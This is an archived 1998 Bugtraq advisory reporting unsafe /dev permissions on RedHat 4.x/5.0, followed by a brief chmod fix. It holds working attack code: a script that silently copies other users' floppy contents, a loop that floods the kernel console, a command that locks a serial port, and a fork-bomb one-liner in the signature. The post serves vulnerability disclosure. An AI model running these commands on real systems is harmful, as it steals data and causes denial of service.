Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1998_1

Bugtraq archives for 1st quarter (Jan-Mar) 1998: RedHat 4.x/5.0 /dev permissions

RedHat 4.x/5.0 /dev permissions

=?UNKNOWN-8BIT?Q?Micha=B3?= Zalewski (lcamtufPOLBOX.COM)
Wed, 4 Feb 1998 09:45:37 +0100

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Rafal Wojtczuk: "An old ld-linux.so hole"
Previous message: Pavel Kankovsky: "serious security problem in XKB--ERRATUM"
Next in thread: Darren J Moffat - Sun UK - Consultant Engineer: "Re: RedHat 4.x/5.0 /dev permissions"

First one
----------

Any user can read data from (even not mounted) floppy using
"cat /dev/fd0H1440". It isn't dangerous itself, but... Any user
may write a script, which periodically checks if floppy has been
just unmounted, then dumps it's content to a file. Here's a sample
'floppy collector':

-- fdumper --
#!/bin/sh
DUMP_DEV=/dev/fd0H1440
MOUNT_DEV=/dev/fd0
LABEL=0
DUMPED=1
while :; do
  sleep 1
  if [ "`mount|grep \"^${MOUNT_DEV}\"`" = "" ]; then
    if [ "$DUMPED" = "0" ]; then
      echo "Dumping image #$LABEL..."
      cat $DUMP_DEV >.fdimage$LABEL
      let LABEL=LABEL+1
      DUMPED=1
    fi
  else
    DUMPED=0
  fi
done
-- eof --

Also, if there's no floppy in drive, unprivledged user may flood
kernel log console (local console by default!!!):

[userhost sth]$ while :; do cat /dev/fd0H1440;done &

It will generate a lot of kernel messages, which will be logged
to /var/log/messages AND to console (default klogd behaviour). Also,
every printk(...) (called by fd driver) uses sync() to flush buffers.
It will cause abnormal hdd activity.

Second one
-----------
(not tested with rh 5.0)

Ordinary user are allowed to read /dev/ttyS*. Serial ports driver
disallows multiple access attempts at the same time, so user may
permanently lock choosen port using this command:

[userhost user]$ cat /dev/ttyS0
(Ctrl+Z)
[userhost user]$ cat /dev/ttyS0
cat: /dev/ttyS0: device is busy

Now serial port is in unusable state.

That's all?
------------

There are also a lot of other, not-so-common devices, eg. /dev/sequencer,
which are world-readable or even world-writable.

There's no ANY reason to give ordinary users direct access to hardware
devices. It's quite easy (as shown above ;) to obtain an interesting
data or cause system failure by reading/writing these devices.

Solution...
------------

ls -l /dev/* | grep "r-- "
chmod ;)

_______________________________________________________________________
Micha³ Zalewski [tel 9690] | finger 4 PGP [lcamtufboss.staszic.waw.pl]
Iterowaæ jest rzecz± ludzk±, wykonywaæ rekursywnie - bosk± [P. Deustch]
=------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=

Next message: Rafal Wojtczuk: "An old ld-linux.so hole"
Previous message: Pavel Kankovsky: "serious security problem in XKB--ERRATUM"
Next in thread: Darren J Moffat - Sun UK - Consultant Engineer: "Re: RedHat 4.x/5.0 /dev permissions"